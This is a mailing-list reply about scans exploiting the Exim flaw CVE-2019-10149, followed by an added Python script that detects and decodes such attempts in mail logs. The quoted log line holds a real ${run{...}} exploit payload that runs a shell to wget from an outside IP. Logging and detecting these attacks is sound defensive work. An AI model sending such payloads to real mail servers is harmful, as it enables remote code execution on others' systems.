Re: [bitfolk] Scans attempting to exploit CVE-2019-10149 hav…

Author: John Winters
Date: 2019-06-23 06:20 -000
To: users
Subject: Re: [bitfolk] Scans attempting to exploit CVE-2019-10149 have been in the wild for some days

gpg: Signature made Sun Jun 23 06:20:59 2019 UTC
gpg: using RSA key C0E6128BC8C4B6F8770FA62AB265A6CAA060392F
gpg: Can't check signature: No public key
On 23/06/2019 04:24, Andy Smith wrote:
> Hello,
>
> I've just run a grep on all of my mail logs for the string "run{" to
> see who's been trying to exploit CVE-2019-10149. A successful match
> looks like this on my MTA (Exim):
>
> 2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}@???>: Unrouteable address


Am I right in thinking that the fact that the log entry says "rejected
RCPT" etc. means that the attack has been thwarted?

Cheers,
John

--
Xronos Scheduler - https://xronos.uk/
All your school's schedule information in one place.
Timetable, activities, homework, public events - the lot
Live demo at https://schedulerdemo.xronos.uk/
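
Added example, not part of the original messages: a Python version of the grep Andy describes, which also decodes the escaped command for triage and separates lines logged as "rejected RCPT" from any other line carrying the pattern. The sample log lines are constructed, and the "<=" line assumes Exim's received_recipients log selector is enabled.

```python
import re

# Constructed sample lines in Exim main-log style (not from the thread); the
# hosts use documentation address ranges and the embedded command is harmless.
SAMPLE_LOG = r"""
2019-06-19 14:57:19 H=host.example (mail.example) [192.0.2.10] F=<a@example.org> rejected RCPT <root+${run{\x2Fbin\x2Fecho\tconstructed\x2Dsample}}@example.net>: Unrouteable address
2019-06-19 15:02:11 1hdXyZ-0001Ab-CD <= <> H=(mail.example) [192.0.2.20] P=esmtp S=812 for root+${run{\x2Fbin\x2Fecho\tconstructed\x2Dsample}}@localhost
2019-06-19 15:03:40 H=other.example [198.51.100.7] F=<b@example.org> rejected RCPT <nobody@example.net>: Unrouteable address
""".strip().splitlines()

RUN_RE = re.compile(r"\$\{run\{(.*?)\}\}")            # the "run{" expansion item
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")  # connecting host address


def decode(payload):
    """Turn \\xHH and \\t escapes back into readable text for triage."""
    text = re.sub(r"\\x([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), payload)
    return text.replace("\\t", " ")


def scan(lines):
    """Return one record per log line that carries a ${run{...}} item."""
    hits = []
    for line in lines:
        m = RUN_RE.search(line)
        if not m:
            continue
        ip = IP_RE.search(line)
        hits.append({
            "time": line[:19],
            "ip": ip.group(1) if ip else None,
            # "rejected RCPT" is what the log line quoted above shows; any
            # other line carrying the pattern is flagged for manual review.
            "disposition": "rejected" if " rejected RCPT " in line else "review",
            "command": decode(m.group(1)),
        })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```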